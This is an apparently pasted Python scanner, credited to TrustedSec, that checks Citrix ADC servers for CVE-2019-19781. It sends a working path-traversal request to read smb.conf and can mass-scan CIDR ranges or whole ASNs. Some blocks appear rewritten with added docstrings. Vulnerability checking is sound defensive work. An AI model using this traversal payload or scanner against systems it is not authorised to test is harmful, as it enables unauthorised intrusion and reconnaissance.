
Untitled

a guest
Jan 20th, 2020
  1. #!/usr/bin/env python3
  2. #
  3. # Single check to see if the server is still vulnerable to CVE-2019-19781
  4. # Written by: Dave Kennedy
  5. # Company: TrustedSec
  6. #
  7. import requests
  8. import urllib3
  9. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
  10. import argparse
  11. from netaddr import IPNetwork
  12. import threading
  13. import time
  14. import subprocess
  15.  
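  def asn_to_ip(asn):
      """Return up to ten IPv4 CIDR prefixes that RADb lists for origin *asn*.

      The AS number is validated and then passed to ``whois`` as a single
      argument, without a shell, so characters in *asn* can never be
      interpreted as shell syntax. The whois reply is remote, unauthenticated
      data: only substrings shaped like ``a.b.c.d/len`` are kept.

      Args:
          asn: AS number as typed on the command line, e.g. ``"as15169"``.

      Returns:
          A list of CIDR strings (at most ten, the same cap the earlier
          ``head`` pipeline applied). Empty when *asn* is not a valid AS
          number or the registry returned no prefixes.

      Raises:
          SystemExit: if the ``whois`` binary is not installed.
      """
      import re  # function-scope import: the file's import block has no re

      asn = str(asn).strip()
      # Only a literal "AS<digits>" is ever handed to whois.
      if not re.fullmatch(r"[Aa][Ss][0-9]+", asn):
          print("[-] %r is not a valid AS number (expected e.g. AS15169)." % asn)
          return []

      try:
          # "-i origin <asn>" is one argument to whois, exactly as the quoted
          # form was in the shell command line.
          lookup = subprocess.run(
              ["whois", "-h", "whois.radb.net", "--", "-i origin %s" % asn],
              stdout=subprocess.PIPE,
              stderr=subprocess.PIPE,
          )
      except FileNotFoundError:
          # if we don't have whois installed
          print("[-] In order for ASN looks to work you must have whois installed. Type apt-get install whois as an example on Debian/Ubuntu.")
          raise SystemExit(1)

      # The registry reply is not guaranteed to be valid UTF-8.
      reply = lookup.stdout.decode('utf-8', errors='replace')
      cidr_pattern = re.compile(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}/[0-9]{1,2}\b")
      return cidr_pattern.findall(reply)[:10]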
  32.  
  33.  
  34. # we need to do this hack job due to sanitization of urls in the latest version of urllib3
  35. # special thanks to rxwx for the fix
  def submit_url(url):
      """Send a GET request for *url* and return the response.

      The prepared request's URL is overwritten with the caller's exact
      string, so the percent-encoded path segments reach the server as
      written instead of in the form produced by ``prepare()``.

      Certificate verification is disabled (``verify=False``), so the peer is
      not authenticated; the response should be read as "whatever answered on
      that address", not as proof of which host replied. The request times
      out after 2 seconds.
      """
      prepared = requests.Request(method='GET', url=url).prepare()
      # Restore the raw URL over the one prepare() produced.
      prepared.url = url
      with requests.Session() as session:
          response = session.send(prepared, verify=False, timeout=2)
      return response
  42.  
  43. # our main function for testing the vulnerability
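  def check_server(target, targetport, verbose):
      """Probe one host for CVE-2019-19781 and record it if it is exposed.

      Requests the smb.conf path through submit_url() and classifies the
      response:

      * all three smb.conf markers present in the body: reported as
        vulnerable, appended to the module-level ``vulnServers`` list;
      * body mentions "Citrix" or the status is 403: reported as not
        vulnerable;
      * anything else: reported as non-Citrix, only when *verbose* is set.

      Timeouts and connection errors are printed only when *verbose* is set,
      so a target that produces no output has not been shown to be patched.

      Args:
          target: host name or IP address to probe.
          targetport: port to connect to; "80" selects plain HTTP, every
              other value HTTPS.
          verbose: when truthy, also print non-Citrix and unreachable hosts.

      Returns:
          1 when the host is reported vulnerable, otherwise None.
      """
      try:
          print("Scanning for CVE-2019-19781 on: %s " % target) # Cleaning up output a little

          # if for some ungodly reason they are using HTTP; HTTPS otherwise
          scheme = "http" if str(targetport) == "80" else "https"
          url = "%s://%s:%s/vpn/js/%%2e./.%%2e/%%76pns/cfg/smb.conf" % (scheme, target, targetport)
          req = submit_url(url)
          body = req.content

          # Every marker must be present. The earlier chained `and` expression
          # only tested the last string, because the first two operands were
          # bare non-empty literals (always true), which allowed false
          # positives on any page containing "name resolve order".
          smb_conf_markers = (b"[global]", b"encrypt passwords", b"name resolve order")
          if all(marker in body for marker in smb_conf_markers):
              print("[\033[91m!\033[0m] This Citrix ADC Server: %s is still vulnerable to CVE-2019-19781." % (target))
              vulnServers.append(target)
              return 1

          # if the system responds with a Citrix message (fixed) or a 403 (fixed)
          # NOTE(review): a 403 from any web server lands here and is printed
          # as "CITRIX Server found"; confirm the product before relying on it.
          if b"Citrix" in body or req.status_code == 403:
              print("[\033[92m*\033[0m] CITRIX Server found, However the server %s is not vulnerable. Awesome!" % (target))

          # if we run into something other than Citrix
          elif verbose:
              print("[-] Server %s does not appear to be a Citrix server." % (target))

      # handle exception errors due to timeouts
      except requests.ReadTimeout:
          if verbose:
              print("[-] ReadTimeout: Server %s timed out and didn't respond on port: %s." % (target, targetport))

      except requests.ConnectTimeout:
          if verbose:
              print("[-] ConnectTimeout: Server %s did not respond to a web request or the port (%s) is not open." % (target, targetport))

      except requests.ConnectionError:
          if verbose:
              print("[-] ConnectionError: Server %s did not respond to a web request or the port (%s) is not open." % (target,targetport))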
  84.  
  # Start-up banner and usage text. Raw string pieces keep the backslashes of
  # the ASCII art literal; the leading and trailing empty entries reproduce
  # the blank first and last lines of the banner.
  print("\n".join((
      "",
      r"_______ ________ ___ ___ __ ___ __ ___ ______ ___ __",
      r"/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ |/ _ \____ / _ \/_ |",
      r"| | \ \ / /| |__ ______ ) | | | || | (_) |______| | (_) | / / (_) || |",
      r"| | \ \/ / | __|______/ /| | | || |\__, |______| |\__, | / / > _ < | |",
      r"| |____ \ / | |____ / /_| |_| || | / / | | / / / / | (_) || |",
      r"\_____| \/ |______| |____|\___/ |_| /_/ |_| /_/ /_/ \___/ |_|",
      "",
      "CVE-2019-19781-Scanner",
      "Company: TrustedSec",
      "Written by: Dave Kennedy",
      "This will look to see if the remote system is still vulnerable to CVE-2019-19781. This",
      "will only scan one host at a time.",
      "You can use CIDR notations as well for example: 192.168.1.1/24",
      "You can use hostnames instead of IP addresses also.",
      "Example: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443",
      "Example2: python3 cve-2019-19781_scanner.py 192.168.1.1 443",
      "Example3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443",
      "Example4: python3 cve-2019-19781_scanner.py as15169 443",
      "Example5: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose",
      "Usage: python3 cve-2019-19781_scanner.py targetip targetport",
      "",
  )))
  107.  
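  # Shared scan state: check_server() appends hosts it reports as vulnerable
  # to vulnServers; counter is the number of hosts handed to check_server().
  vulnServers = []
  counter = 0

  # parse our commands
  parser = argparse.ArgumentParser()
  parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
  parser.add_argument("targetport", help="the target server web port (normally on 443)")
  parser.add_argument("verbose", nargs="?", help="print out verbose information")
  args = parser.parse_args()

  # any third positional argument switches verbose output on
  verbose = bool(args.verbose)

  try:
      # Treat the target as an AS number only when it is exactly "as" followed
      # by ASCII digits. A plain substring test would send any host name that
      # merely contains "as" down the whois path.
      asn_digits = args.target.lower()[2:]
      is_asn = (
          args.target.lower().startswith("as")
          and asn_digits != ""
          and all(ch in "0123456789" for ch in asn_digits)
      )

      if is_asn:
          networks = asn_to_ip(args.target)
      # if we are iterating through IP addresses to scan CIDR notations
      elif "/" in args.target:
          networks = [args.target]
      # if we are just using 1 IP address or host name
      else:
          networks = None

      workers = []
      if networks is None:
          counter = counter + 1
          check_server(args.target, args.targetport, verbose)
      else:
          for ip_block in networks:
              for ip in IPNetwork(ip_block):
                  counter = counter + 1
                  worker = threading.Thread(target=check_server, args=(ip, args.targetport, verbose))
                  worker.start()
                  workers.append(worker)
                  # brief pause between thread starts, as in the original loops
                  time.sleep(0.05)

      # Join every worker, not only the last one started, so the report below
      # is printed after all results are in. This also avoids touching an
      # undefined thread variable when the lookup produced no addresses.
      for worker in workers:
          worker.join()

      # do a report on vuln servers
      print("Finished testing %s servers: Found %s to be vulnerable. Below is a list system(s) identified:" % (counter, len(vulnServers)))
      print("-" * 45)
      for server in vulnServers:
          print(server)

  except KeyboardInterrupt:
      print("[!] interrupt received, stopping..")
      time.sleep(0.1)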